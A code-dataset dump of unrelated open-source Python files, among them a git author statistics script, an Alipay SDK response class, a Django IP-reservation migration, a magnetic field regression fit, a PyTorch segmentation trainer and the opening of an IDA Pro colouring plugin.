"<NAME>": "salkinium",
"<NAME>": "rleh",
"<NAME>": "strongly-typed",
"<NAME>": "7Kronos",
"<NAME>": "TheTh0r",
"<NAME>": "tomchy",
"<NAME>": "acristoffers",
}
def get_author_log(since = None, until = None, handles = True, count = False):
sl_command = "git shortlog -sn"
if since is not None:
sl_command += " --since=\"{}\"".format(since)
if until is not None:
sl_command += " --until=\"{}\"".format(until)
# get the shortlog summary
output = subprocess.Popen(sl_command, shell=True, stdout=subprocess.PIPE)\
.stdout.read().decode(locale.getpreferredencoding())
# parse the shortlog
shortlog = defaultdict(int)
for line in output.splitlines():
commits, author = line.split("\t")
shortlog[author] += int(commits)
# convert to list of tuples for sorting
commit_tuples = [(c, a) for a, c in shortlog.items()]
if count:
# sort by number of commits, then alphabetically by author
commit_tuples.sort(key=lambda a: (-a[0], a[1]))
else:
# sort by name
commit_tuples.sort(key=lambda a: a[1])
output = []
for (commits, author) in commit_tuples:
out = author
if handles and author in author_handles and author_handles[author] is not None:
out += u" (@{})".format(author_handles[author])
if count:
out = u"{:4} {}".format(commits, out)
output.append(out)
return output
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Author statistics of xpcc.")
parser.add_argument("--handles", dest="with_handles", action="store_true",
help="adds the GitHub handle to the author if known")
parser.add_argument("--count", dest="with_count", action="store_true",
help="adds and sorts authors by commit count")
parser.add_argument("--shoutout", dest="with_shoutout", action="store_true",
help="annotates first time contributers")
parser.add_argument("--since", dest="since",
help="evaluates the git history from this date until present")
args = parser.parse_args()
since_date = args.since if args.since else None
log_authors = get_author_log(since=since_date, handles=args.with_handles, count=args.with_count)
new_authors = []
if args.with_shoutout and since_date:
previous_authors = get_author_log(until=since_date, handles=False, count=False)
new_authors = get_author_log(since=since_date, handles=False, count=False)
new_authors = [a for a in new_authors if a not in previous_authors]
authors = []
for author in log_authors:
if any(a in author for a in new_authors):
author += u" 🎉🎊"
authors.append(author)
print("\n".join(authors))
|
tests/test_provider_hashicorp_hashicups.py | mjuenema/python-terrascript | 507 | 12798374 | <gh_stars>100-1000
# tests/test_provider_hashicorp_hashicups.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:18:02 UTC)
def test_provider_import():
import terrascript.provider.hashicorp.hashicups
def test_resource_import():
from terrascript.resource.hashicorp.hashicups import hashicups_order
def test_datasource_import():
from terrascript.data.hashicorp.hashicups import hashicups_coffees
from terrascript.data.hashicorp.hashicups import hashicups_ingredients
from terrascript.data.hashicorp.hashicups import hashicups_order
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.hashicorp.hashicups
#
# t = terrascript.provider.hashicorp.hashicups.hashicups()
# s = str(t)
#
# assert 'https://github.com/hashicorp/terraform-provider-hashicups' in s
# assert '0.3.1' in s
|
src/kpdetector/concatenate_results.py | gathierry/FashionAI-KeyPointsDetectionOfApparel | 174 | 12798389 | import pandas as pd
from src.config import Config
config = Config()
dfs = []
for cloth in ['blouse', 'skirt', 'outwear', 'dress', 'trousers']:
df = pd.read_csv(config.proj_path + 'kp_predictions/' + cloth + '.csv')
dfs.append(df)
res_df = pd.concat(dfs)
res_df.to_csv(config.proj_path +'kp_predictions/result.csv', index=False) |
vkwave/bots/core/dispatching/handler/__init__.py | Stunnerr/vkwave | 222 | 12798447 | from .base import BaseHandler, DefaultHandler # noqa: F401
from .cast import caster as callback_caster # noqa: F401
|
alipay/aop/api/response/AlipayOpenMiniPlanOperateBatchqueryResponse.py | antopen/alipay-sdk-python-all | 213 | 12798467 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.PaymentSuccessPagePlanInfo import PaymentSuccessPagePlanInfo
class AlipayOpenMiniPlanOperateBatchqueryResponse(AlipayResponse):
def __init__(self):
super(AlipayOpenMiniPlanOperateBatchqueryResponse, self).__init__()
self._page_data = None
self._page_num = None
self._page_size = None
self._total_number = None
@property
def page_data(self):
return self._page_data
@page_data.setter
def page_data(self, value):
if isinstance(value, list):
self._page_data = list()
for i in value:
if isinstance(i, PaymentSuccessPagePlanInfo):
self._page_data.append(i)
else:
self._page_data.append(PaymentSuccessPagePlanInfo.from_alipay_dict(i))
@property
def page_num(self):
return self._page_num
@page_num.setter
def page_num(self, value):
self._page_num = value
@property
def page_size(self):
return self._page_size
@page_size.setter
def page_size(self, value):
self._page_size = value
@property
def total_number(self):
return self._total_number
@total_number.setter
def total_number(self, value):
self._total_number = value
def parse_response_content(self, response_content):
response = super(AlipayOpenMiniPlanOperateBatchqueryResponse, self).parse_response_content(response_content)
if 'page_data' in response:
self.page_data = response['page_data']
if 'page_num' in response:
self.page_num = response['page_num']
if 'page_size' in response:
self.page_size = response['page_size']
if 'total_number' in response:
self.total_number = response['total_number']
|
src/exabgp/util/od.py | pierky/exabgp | 1,560 | 12798482 | <reponame>pierky/exabgp
# encoding: utf-8
"""
od.py
Created by <NAME> on 2009-09-06.
Copyright (c) 2009-2017 Exa Networks. All rights reserved.
License: 3-clause BSD. (See the COPYRIGHT file)
"""
def od(value):
def spaced(value):
even = None
for v in value:
if even is False:
yield ' '
yield '%02X' % v
even = not even
return ''.join(spaced(value))
|
server/utils/workflow.py | Samsong1991/django-vue-admin | 425 | 12798485 | <gh_stars>100-1000
from django.conf import settings
import time
import requests
import hashlib
import traceback
import json
class WorkFlowAPiRequest(object):
def __init__(self,token=settings.WORKFLOW_TOKEN, appname=settings.WORKFLOW_APP, username='admin', workflowurl=settings.WORKFLOW_URL):
self.token = token
self.appname = appname
self.username = username
self.workflowurl = workflowurl
def getrequestheader(self):
timestamp = str(time.time())[:10]
ori_str = timestamp + self.token
signature = hashlib.md5(ori_str.encode(encoding='utf-8')).hexdigest()
headers = dict(signature=signature, timestamp=timestamp, appname=self.appname, username=self.username)
return headers
def getdata(self,parameters=dict(),method='get',url='/api/v1.0/workflows/',timeout=300,data=dict()):
if method not in ['get','post','put','delete','patch']:
return False,'method must be one of get post put delete or patch'
if not isinstance(parameters,dict):
return False,'Parameters must be dict'
headers = self.getrequestheader()
try:
r = getattr(requests,method)('{0}{1}'.format(self.workflowurl,url), headers=headers, params=parameters,timeout=timeout,data=json.dumps(data))
result = r.json()
return True,result
except:
return False,traceback.format_exc()
# ins = WorkFlowAPiRequest()
# print (ins.getdata(parameters=dict(username='admin', per_page=20, name=''),method='get',url='/api/v1.0/workflows')) |
patchlion/0000/DrawHeadImage.py | saurabh896/python-1 | 3,976 | 12798558 | <filename>patchlion/0000/DrawHeadImage.py<gh_stars>1000+
# -*- coding: utf-8 -*-
__author__ = 'PatchLion'
from PIL import Image, ImageDraw,ImageFont
def drawNumberOnIcon(imgpath, number):
img = Image.open(imgpath)
if (None == img):
print('打开图片失败')
return
img = img.resize((160, 160))
print(imgpath, "->", img.format, img.size, img.mode)
draw = ImageDraw.Draw(img)
img_size = img.size
font = ImageFont.truetype("Varela-Regular.otf", size=int(img_size[1]/4))
text_size = font.getsize(str(number))
draw.text((img_size[0]-text_size[0], 0), str(number), font=font, fill=(255, 0, 0))
img.save('icon_withnumber.jpg')
print('生成图片成功')
drawNumberOnIcon("icon.jpg", 21) |
finetuning/v1/evaluate.py | wietsedv/bertje | 104 | 12798564 | <gh_stars>100-1000
import argparse
import os
from collections import Counter
from sklearn.metrics import confusion_matrix, classification_report
def read_labels(filename):
labels = []
with open(filename) as f:
for line in f:
line = line.strip()
if len(line) == 0:
continue
_, label = line.split('\t')
labels.append(label)
return labels
def compare_labels(true_labels, pred_labels):
true_set = set(true_labels)
pred_set = set(pred_labels)
print('\n▶ Label usage:')
print(' ~ Used in both: {}'.format(true_set | pred_set))
print(' ~ Extra in true: {}'.format(true_set - pred_set))
print(' ~ Extra in pred: {}'.format(pred_set - true_set))
print('\n▶ Raw counts:')
true_counts = Counter(true_labels)
pred_counts = Counter(pred_labels)
sorted_labels = sorted(true_counts, key=true_counts.get, reverse=True) + sorted(pred_set - true_set)
print('\tTrue\tPred\tDiff')
for label in sorted_labels:
diff = pred_counts[label] - true_counts[label]
direction = '+' if diff > 0 else '-' if diff < 0 else ' '
if diff < 0:
diff = -diff
print('{}\t{}\t{}\t{}{:4}'.format(label, true_counts[label], pred_counts[label], direction, diff))
print('\n▶ Confusion matrix:')
sorted_labels = sorted(true_set | pred_set)
padded_labels = [lab + ' ' * (4 - len(lab)) if len(lab) < 8 else lab for lab in sorted_labels]
cm = confusion_matrix(true_labels, pred_labels, labels=sorted_labels)
print(' \tpredicted:')
print(' \t' + '\t'.join(padded_labels))
for i in range(len(cm)):
prefix = 'true: ' if i == 0 else ' ' * 6
prefix += padded_labels[i]
print(prefix + '\t' + '\t'.join([str(n) for n in cm[i]]))
print('\n▶ Classification report:')
print(classification_report(true_labels, pred_labels, digits=3))
print('\n▶ Classification report w/o O label:')
print(classification_report(true_labels, pred_labels, labels=list(true_set - {'O'}), digits=3))
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--path", default=None, type=str, required=True, help="Base path")
parser.add_argument("--name", default=None, type=str, required=True, help="File name [train,dev,test]")
args = parser.parse_args()
true_path = os.path.join(args.path, args.name + '.true.tsv')
pred_path = os.path.join(args.path, args.name + '.pred.tsv')
true_labels = read_labels(true_path)
print('▶ Read true labels from {}'.format(true_path))
pred_labels = read_labels(pred_path)
print('▶ Read pred labels from {}'.format(pred_path))
if len(true_labels) != len(pred_labels):
print('True and pred file do not have the same amount of labels ({} and {})'.format(
len(true_labels), len(pred_labels)))
exit(-1)
print('\nFull label comparison:')
compare_labels(true_labels, pred_labels)
if set([lab[0] for lab in true_labels]) == {'B', 'I', 'O'}:
true_label_cats = [lab if lab == 'O' else lab[2:] for lab in true_labels]
pred_label_cats = [lab if lab == 'O' else lab[2:] for lab in pred_labels]
print('\nBIO category comparison:')
compare_labels(true_label_cats, pred_label_cats)
if 'O' in true_labels:
true_label_binary = ['O' if lab == 'O' else 'X' for lab in true_labels]
pred_label_binary = ['O' if lab == 'O' else 'X' for lab in pred_labels]
print('\nBinary comparison:')
compare_labels(true_label_binary, pred_label_binary)
if __name__ == '__main__':
main()
|
build-tools/scripts/update_gpu_list.py | daniel-falk/nnabla-ext-cuda | 103 | 12798591 | <gh_stars>100-1000
# Copyright 2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib.request as request
from html.parser import HTMLParser
import re
from mako.template import Template
import os
from gpu_info import incompatible_arcs, gpu_compute_capability_to_arc
basedir = os.path.dirname(os.path.abspath(__file__))
r = request.urlopen('https://developer.nvidia.com/cuda-gpus')
class GetGpuListFromNvidiaSite(HTMLParser):
def __init__(self):
super().__init__()
self.td = False
self.last_value = None
self.last_data = ''
self.gpu_data = {}
def handle_starttag(self, tag, attrs):
if tag == 'td':
self.td = True
def handle_endtag(self, tag):
if tag == 'td':
if self.td:
m = re.match(r'((\d+)\.(\d+))', self.last_data.strip())
if m:
cap = m.group(1)
cap_major = int(m.group(2))
cap_minor = int(m.group(3))
arch = gpu_compute_capability_to_arc.get(cap_major)
if arch is None:
arch = gpu_compute_capability_to_arc.get(
(cap_major, cap_minor))
if arch is None:
print(f'Error: unknown capability [{cap}]')
arch = ''
name = self.last_value.lower().replace(
'nvidia ', '').replace('tesla ', '') # remove prefix
self.gpu_data[name] = (arch, cap)
self.last_value = self.last_data.strip()
self.last_data = ''
self.td = False
def handle_data(self, data):
if self.td:
self.last_data += data
parser = GetGpuListFromNvidiaSite()
parser.feed(r.read().decode())
gpus_info = parser.gpu_data
incompatible_gpus = {}
for k in incompatible_arcs:
if not incompatible_gpus.get(k):
incompatible_gpus[k] = []
iarc = incompatible_arcs[k]
for gpu_name in gpus_info.keys():
if gpus_info[gpu_name][0] in iarc:
incompatible_gpus[k].append(gpu_name)
fname = os.path.join(basedir, 'skel', 'incompatibale_gpu_list.py.tmpl')
tmpl = Template(filename=fname)
lines = tmpl.render(args=incompatible_gpus)
with open("./python/src/nnabla_ext/cuda/incompatible_gpu_list.py", 'w') as f:
for l in lines:
f.write(l)
|
src/ralph/networks/migrations/0008_auto_20160808_0719.py | DoNnMyTh/ralph | 1,668 | 12798606 | <reponame>DoNnMyTh/ralph<gh_stars>1000+
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import ipaddress
from itertools import chain
from django.db import migrations, models
IPADDRESS_STATUS_RESERVED = 2
def _reserve_margin_addresses(network, bottom_count, top_count, IPAddress):
ips = []
ips_query = IPAddress.objects.filter(
models.Q(
number__gte=network.min_ip + 1,
number__lte=network.min_ip + bottom_count + 1
) |
models.Q(
number__gte=network.max_ip - top_count,
number__lte=network.max_ip
)
)
existing_ips = set(ips_query.values_list('number', flat=True))
to_create = set(chain.from_iterable([
range(int(network.min_ip + 1), int(network.min_ip + bottom_count + 1)), # noqa
range(int(network.max_ip - top_count), int(network.max_ip))
]))
to_create = to_create - existing_ips
for ip_as_int in to_create:
ips.append(IPAddress(
address=str(ipaddress.ip_address(ip_as_int)),
number=ip_as_int,
network=network,
status=IPADDRESS_STATUS_RESERVED
))
print('Creating {} ips for {}'.format(len(ips), network))
IPAddress.objects.bulk_create(ips)
ips_query.update(status=IPADDRESS_STATUS_RESERVED)
def create_reserved_ips(apps, schema_editor):
IPAddress = apps.get_model('networks', 'IPAddress')
Network = apps.get_model('networks', 'Network')
for network in Network.objects.all():
_reserve_margin_addresses(
network,
network.reserved_from_beginning,
network.reserved_from_end,
IPAddress
)
def remove_reserved_ips(apps, schema_editor):
IPAddress = apps.get_model('networks', 'IPAddress')
ips = IPAddress.objects.filter(
models.Q(ethernet__isnull=True) | (
models.Q(ethernet__base_object__isnull=True) &
models.Q(ethernet__mac__isnull=False)
),
status=IPADDRESS_STATUS_RESERVED,
gateway_network__isnull=True,
)
print('Removing {} reserved IPs'.format(ips.count()))
ips.delete()
class Migration(migrations.Migration):
dependencies = [
('networks', '0007_auto_20160804_1409'),
]
operations = [
migrations.AddField(
model_name='network',
name='reserved_from_beginning',
field=models.PositiveIntegerField(help_text='Number of addresses to be omitted in DHCP automatic assignmentcounted from the first IP in range (excluding network address)', default=10),
),
migrations.AddField(
model_name='network',
name='reserved_from_end',
field=models.PositiveIntegerField(help_text='Number of addresses to be omitted in DHCP automatic assignmentcounted from the last IP in range (excluding broadcast address)', default=0),
),
migrations.RunPython(
remove_reserved_ips,
reverse_code=create_reserved_ips
),
]
|
PWGPP/FieldParam/fitsol.py | maroozm/AliPhysics | 114 | 12798686 | #!/usr/bin/env python
debug = True # enable trace
def trace(x):
global debug
if debug: print(x)
trace("loading...")
from itertools import combinations, combinations_with_replacement
from glob import glob
from math import *
import operator
from os.path import basename
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import sklearn.linear_model
import sklearn.feature_selection
import datetime
def prec_from_pathname(path):
if '2k' in path: return 0.002
elif '5k' in path: return 0.005
else: raise AssertionError('Unknown field strengh: %s' % path)
# ['x', 'y', 'z', 'xx', 'xy', 'xz', 'yy', ...]
def combinatrial_vars(vars_str='xyz', length=3):
term_list = []
for l in range(length):
term_list.extend([''.join(v) for v in combinations_with_replacement(list(vars_str), 1 + l)])
return term_list
# product :: a#* => [a] -> a
def product(xs):
return reduce(operator.mul, xs, 1) # foldl in Haskell
# (XYZ, "xx") -> XX
def term(dataframe, vars_str):
return product(map(lambda x: dataframe[x], list(vars_str)))
# (f(X), Y) -> (max deviation, max%, avg dev, avg%)
def deviation_stat(fX, Y, prec=0.005):
dev = np.abs(fX - Y)
(max_dev, avg_dev) = (dev.max(axis=0), dev.mean(axis=0))
(max_pct, avg_pct) = (max_dev / prec * 100, avg_dev / prec * 100)
return (max_dev, max_pct, avg_dev, avg_pct)
# IO Df
def load_samples(path, cylindrical_axis=True, absolute_axis=True, genvars=[]):
sample_cols = ['x', 'y', 'z', 'Bx', 'By', 'Bz']
df = pd.read_csv(path, sep=' ', names=sample_cols)
if cylindrical_axis:
df['r'] = np.sqrt(df.x**2 + df.y**2)
df['p'] = np.arctan2(df.y, df.x)
df['Bt'] = np.sqrt(df.Bx**2 + df.By**2)
df['Bpsi'] = np.arctan2(df.By, df.Bx) - np.arctan2(df.y, df.x)
df['Br'] = df.Bt * np.cos(df.Bpsi)
df['Bp'] = df.Bt * np.sin(df.Bpsi)
if absolute_axis:
df['X'] = np.abs(df.x)
df['Y'] = np.abs(df.y)
df['Z'] = np.abs(df.z)
for var in genvars:
df[var] = term(df, var)
return df
def choose(vars, df1, df2):
X1 = df1.loc[:, vars].as_matrix()
X2 = df2.loc[:, vars].as_matrix()
return (X1, X2)
# IO ()
def run_analysis_for_all_fields():
sample_set = glob("dat_z22/*2k*.sample.dat")
test_set = glob("dat_z22/*2k*.test.dat")
#print(sample_set, test_set)
assert(len(sample_set) == len(test_set) and len(sample_set) > 0)
result = pd.DataFrame()
for i, sample_file in enumerate(sample_set):
trace("run_analysis('%s', '%s')" % (sample_file, test_set[i]))
df = run_analysis(sample_file, test_set[i])
result = result.append(df, ignore_index=True)
write_header(result)
def run_analysis(sample_file = 'dat_z22/tpc2k-z0-q2.sample.dat',
test_file = 'dat_z22/tpc2k-z0-q2.test.dat'):
global precision, df, test, lr, la, xvars_full, xvars, yvars, X, Y, Xtest, Ytest, ana_result
precision = prec_from_pathname(sample_file)
assert(precision == prec_from_pathname(test_file))
xvars_full = combinatrial_vars('xyz', 3)[3:] # variables except x, y, z upto 3 dims
trace("reading training samples... " + sample_file)
df = load_samples(sample_file, genvars=xvars_full)
trace("reading test samples..." + test_file)
test = load_samples(test_file, genvars=xvars_full)
trace("linear regression fit...")
lr = sklearn.linear_model.LinearRegression()
#ri = sklearn.linear_model.RidgeCV()
#la = sklearn.linear_model.LassoCV()
fs = sklearn.feature_selection.RFE(lr, 1, verbose=0)
#xvars = ['x','y','z','xx','yy','zz','xy','yz','xz','xzz','yzz']
#xvars = ["xx", "yy", "zz", 'x', 'y', 'z', 'xzz', 'yzz']
#xvars = ['xxxr', 'xrrX', 'zzrX', 'p', 'xyrr', 'xzzr', 'xrrY', 'xzrX', 'xxxz', 'xzzr']
#xvars=['x', 'xzz', 'xyz', 'yz', 'yy', 'zz', 'xy', 'xx', 'z', 'y', 'xz', 'yzz']
yvars = ['Bx', 'By', 'Bz']
#yvars = ['Bz']
(Y, Ytest) = choose(yvars, df, test)
#(Y, Ytest) = (df['Bz'], test['Bz'])
xvars = combinatrial_vars('xyz', 3) # use all terms upto 3rd power
(X, Xtest) = choose(xvars, df, test)
for y in yvars:
fs.fit(X, df[y])
res = pd.DataFrame({ "term": xvars, "rank": fs.ranking_ })
trace(y)
trace(res.sort_values(by = "rank"))
#xvars=list(res.sort_values(by="rank")[:26]['term'])
lr.fit(X, Y)
trace(', '.join(yvars) + " = 1 + " + ' + '.join(xvars))
test_dev = deviation_stat(lr.predict(Xtest), Ytest, prec=precision)
#for i in range(len(yvars)):
# arr = [lr.intercept_[i]] + lr.coef_[i]
# arr = [ str(x) for x in arr ]
# print(yvars[i] + " = { " + ', '.join(arr) + " }")
# print("deviation stat [test]: max %.2e (%.1f%%) avg %.2e (%.1f%%)" %
# ( test_dev[0][i], test_dev[1][i], test_dev[2][i], test_dev[3][i] ))
(sample_score, test_score) = (lr.score(X, Y), lr.score(Xtest, Ytest))
trace("linear regression R^2 [train data]: %.8f" % sample_score)
trace("linear regression R^2 [test data] : %.8f" % test_score)
return pd.DataFrame(
{ "xvars": [xvars],
"yvars": [yvars],
"max_dev": [test_dev[0]],
"max%": [test_dev[1]],
"avg_dev": [test_dev[2]],
"avg%": [test_dev[3]],
"sample_score": [sample_score],
"score": [test_score],
"coeffs": [lr.coef_],
"intercept": [lr.intercept_],
"sample_file": [sample_file],
"test_file": [test_file],
"precision": [precision],
"volume_id": [volume_id_from_path(sample_file)]
})
def volume_id_from_path(path):
return basename(path)\
.replace('.sample.dat', '')\
.replace('-', '_')
def get_location_by_volume_id(id):
if 'its' in id: r_bin = 0
if 'tpc' in id: r_bin = 1
if 'tof' in id: r_bin = 2
if 'tofext' in id: r_bin = 3
if 'cal' in id: r_bin = 4
z_bin = int(id.split('_')[1][1:]) # "tofext2k_z0_q4" -> 0
if 'q1' in id: quadrant = 0
if 'q2' in id: quadrant = 1
if 'q3' in id: quadrant = 2
if 'q4' in id: quadrant = 3
return r_bin, z_bin, quadrant
def write_header(result):
#result.to_csv("magfield_params.csv")
#result.to_html("magfield_params.html")
print("# This file was generated from sysid.py at " + str(datetime.datetime.today()))
print("# " + ', '.join(result.iloc[0].yvars) + " = 1 + " + ' + '.join(result.iloc[0].xvars))
print("# barrel r: 0 < its < 80 < tpc < 250 < tof < 400 < tofext < 423 < cal < 500")
print("# barrel z: -550 < z < 550")
print("# phi: 0 < q1 < 0.5pi < q2 < pi < q3 < 1.5pi < q4 < 2pi")
print("# header: Rbin Zbin Quadrant Nval_per_compoment(=20)")
print("# data: Nval_per_compoment x floats")
#print("# R^2: coefficient of determination in multiple linear regression. [0,1]")
print("")
for index, row in result.iterrows():
#print("// ** %s - R^2 %s" % (row.volume_id, row.score))
print("#" + row.volume_id)
r_bin, z_bin, quadrant = get_location_by_volume_id(row.volume_id)
print("%s %s %s 20" % (r_bin, z_bin, quadrant))
for i, yvar in enumerate(row.yvars):
name = row.volume_id #+ '_' + yvar.lower()
print("# precision: tgt %.2e max %.2e (%.1f%%) avg %.2e (%.1f%%)" %
(row['precision'], row['max_dev'][i], row['max%'][i], row['avg_dev'][i], row['avg%'][i]))
coef = [row['intercept'][i]] + list(row['coeffs'][i])
arr = [ "%.5e" % x for x in coef ]
body = ' '.join(arr)
#decl = "const double[] %s = { %s };\n" % (name, body)
#print(decl)
print(body)
print("")
#write_header(run_analysis())
run_analysis_for_all_fields()
#for i in range(10):
# for xvars in combinations(xvars_full, i+1):
#(X, Xtest) = choose(xvars, df, test)
#lr.fit(X, Y)
#ri.fit(X, Y)
#la.fit(X, Y)
#fs.fit(X, Y)
#print xvars
#(sample_score, test_score) = (lr.score(X, Y), lr.score(Xtest, Ytest))
#print("linear R^2[sample] %.8f" % sample_score)
#print("linear R^2[test] %.8f" % test_score)
#(sample_score2, test_score2) = (la.score(X, Y), la.score(Xtest, Ytest))
#print("lasso R^2[sample] %.8f" % sample_score2)
#print("lasso R^2[test] %.8f" % test_score2)
#print(la.coef_)
#for i in range(len(yvars)):
# print(yvars[i])
# print(pd.DataFrame({"Name": xvars, "Params": lr.coef_[i]}).sort_values(by='Params'))
# print("+ %e" % lr.intercept_[i])
#sample_dev = deviation_stat(lr.predict(X), Y, prec=precision)
#test_dev = deviation_stat(lr.predict(Xtest), Ytest, prec=precision)
#test_dev2 = deviation_stat(la.predict(Xtest), Ytest, prec=precision)
#print("[sample] max %.2e (%.1f%%) avg %.2e (%.1f%%)" % sample_dev)
#print("[test] max %.2e (%.1f%%) avg %.2e (%.1f%%)" % test_dev )
#print("lasso [test] max %.2e (%.1f%%) avg %.2e (%.1f%%)" % test_dev2 )
|
utils/trainer.py | niqbal996/ViewAL | 126 | 12798717 | import os
import torch
import constants
from utils.misc import get_learning_rate
from utils.summary import TensorboardSummary
from utils.loss import SegmentationLosses
from utils.calculate_weights import calculate_weights_labels
from torch.utils.data import DataLoader
import numpy as np
from utils.metrics import Evaluator
from tqdm import tqdm
import random
class Trainer:
def __init__(self, args, model, train_set, val_set, test_set, class_weights, saver):
self.args = args
self.saver = saver
self.saver.save_experiment_config()
self.train_dataloader = DataLoader(train_set, batch_size=args.batch_size, shuffle=True, num_workers=args.workers)
self.val_dataloader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=args.workers)
self.test_dataloader = DataLoader(test_set, batch_size=args.batch_size, shuffle=False, num_workers=args.workers)
self.train_summary = TensorboardSummary(os.path.join(self.saver.experiment_dir, "train"))
self.train_writer = self.train_summary.create_summary()
self.val_summary = TensorboardSummary(os.path.join(self.saver.experiment_dir, "validation"))
self.val_writer = self.val_summary.create_summary()
self.model = model
self.dataset_size = {'train': len(train_set), 'val': len(val_set), 'test': len(test_set)}
train_params = [{'params': model.get_1x_lr_params(), 'lr': args.lr},
{'params': model.get_10x_lr_params(), 'lr': args.lr * 10}]
if args.use_balanced_weights:
weight = torch.from_numpy(class_weights.astype(np.float32))
else:
weight = None
if args.optimizer == 'SGD':
print('Using SGD')
self.optimizer = torch.optim.SGD(train_params, momentum=args.momentum, weight_decay=args.weight_decay, nesterov=args.nesterov)
elif args.optimizer == 'Adam':
print('Using Adam')
self.optimizer = torch.optim.Adam(train_params, weight_decay=args.weight_decay)
else:
raise NotImplementedError
self.lr_scheduler = None
if args.use_lr_scheduler:
if args.lr_scheduler == 'step':
print('Using step lr scheduler')
self.lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[int(x) for x in args.step_size.split(",")], gamma=0.1)
self.criterion = SegmentationLosses(weight=weight, ignore_index=255, cuda=args.cuda).build_loss(mode=args.loss_type)
self.evaluator = Evaluator(train_set.num_classes)
self.best_pred = 0.0
def training(self, epoch):
train_loss = 0.0
self.model.train()
num_img_tr = len(self.train_dataloader)
tbar = tqdm(self.train_dataloader, desc='\r')
visualization_index = int(random.random() * len(self.train_dataloader))
vis_img, vis_tgt, vis_out = None, None, None
self.train_writer.add_scalar('learning_rate', get_learning_rate(self.optimizer), epoch)
for i, sample in enumerate(tbar):
image, target = sample['image'], sample['label']
image, target = image.cuda(), target.cuda()
self.optimizer.zero_grad()
output = self.model(image)
loss = self.criterion(output, target)
loss.backward()
self.optimizer.step()
train_loss += loss.item()
tbar.set_description('Train loss: %.3f' % (train_loss / (i + 1)))
self.train_writer.add_scalar('total_loss_iter', loss.item(), i + num_img_tr * epoch)
if i == visualization_index:
vis_img, vis_tgt, vis_out = image, target, output
self.train_writer.add_scalar('total_loss_epoch', train_loss / self.dataset_size['train'], epoch)
if constants.VISUALIZATION:
self.train_summary.visualize_state(self.train_writer, self.args.dataset, vis_img, vis_tgt, vis_out, epoch)
print('[Epoch: %d, numImages: %5d]' % (epoch, i * self.args.batch_size + image.data.shape[0]))
print('Loss: %.3f' % train_loss)
print('BestPred: %.3f' % self.best_pred)
def validation(self, epoch, test=False):
self.model.eval()
self.evaluator.reset()
ret_list = []
if test:
tbar = tqdm(self.test_dataloader, desc='\r')
else:
tbar = tqdm(self.val_dataloader, desc='\r')
test_loss = 0.0
visualization_index = int(random.random() * len(self.val_dataloader))
vis_img, vis_tgt, vis_out = None, None, None
for i, sample in enumerate(tbar):
image, target = sample['image'], sample['label']
image, target = image.cuda(), target.cuda()
with torch.no_grad():
output = self.model(image)
if i == visualization_index:
vis_img, vis_tgt, vis_out = image, target, output
loss = self.criterion(output, target)
test_loss += loss.item()
tbar.set_description('Test loss: %.3f' % (test_loss / (i + 1)))
pred = torch.argmax(output, dim=1).data.cpu().numpy()
target = target.cpu().numpy()
self.evaluator.add_batch(target, pred)
Acc = self.evaluator.Pixel_Accuracy()
Acc_class = self.evaluator.Pixel_Accuracy_Class()
mIoU = self.evaluator.Mean_Intersection_over_Union()
mIoU_20 = self.evaluator.Mean_Intersection_over_Union_20()
FWIoU = self.evaluator.Frequency_Weighted_Intersection_over_Union()
if not test:
self.val_writer.add_scalar('total_loss_epoch', test_loss / self.dataset_size['val'], epoch)
self.val_writer.add_scalar('mIoU', mIoU, epoch)
self.val_writer.add_scalar('mIoU_20', mIoU_20, epoch)
self.val_writer.add_scalar('Acc', Acc, epoch)
self.val_writer.add_scalar('Acc_class', Acc_class, epoch)
self.val_writer.add_scalar('fwIoU', FWIoU, epoch)
if constants.VISUALIZATION:
self.val_summary.visualize_state(self.val_writer, self.args.dataset, vis_img, vis_tgt, vis_out, epoch)
print("Test: " if test else "Validation:")
print('[Epoch: %d, numImages: %5d]' % (epoch, i * self.args.batch_size + image.data.shape[0]))
print("Acc:{}, Acc_class:{}, mIoU:{}, mIoU_20:{}, fwIoU: {}".format(Acc, Acc_class, mIoU, mIoU_20, FWIoU))
print('Loss: %.3f' % test_loss)
if not test:
new_pred = mIoU
if new_pred > self.best_pred:
self.best_pred = new_pred
self.saver.save_checkpoint({
'epoch': epoch + 1,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'best_pred': self.best_pred,
})
return test_loss, mIoU, mIoU_20, Acc, Acc_class, FWIoU#, ret_list
def load_best_checkpoint(self):
checkpoint = self.saver.load_checkpoint()
self.model.load_state_dict(checkpoint['state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer'])
print(f'=> loaded checkpoint - epoch {checkpoint["epoch"]})')
return checkpoint["epoch"]
|
src/masonite/authentication/guards/__init__.py | cercos/masonite | 1,816 | 12798748 | <reponame>cercos/masonite
from .WebGuard import WebGuard
|
Reversing/FullColor.py | LeanVel/Tools | 130 | 12798749 | # encoding: utf-8
# http://www.hexblog.com/?p=120
# Default IDA Pro Paths:
# MAC /Applications/IDA\ Pro\ X/idaq.app/Contents/MacOS/plugins/
# Windows C:\Program Files (x86)\IDA X\plugins
# to make it autoexec on openfile
# add this to plugins.cfg
# ; Other plugins
#FullColor FullColor.py 0 0 SILENT
# thanks @JR0driguezB for help :)
from __future__ import print_function
from idautils import Heads
from idc import get_segm_start, get_segm_end, print_insn_mnem, get_screen_ea, print_operand, set_color, CIC_ITEM
import idaapi
#idaapi.auto_wait()
PLUGIN_TEST = 1
class FullColor_t(idaapi.plugin_t):
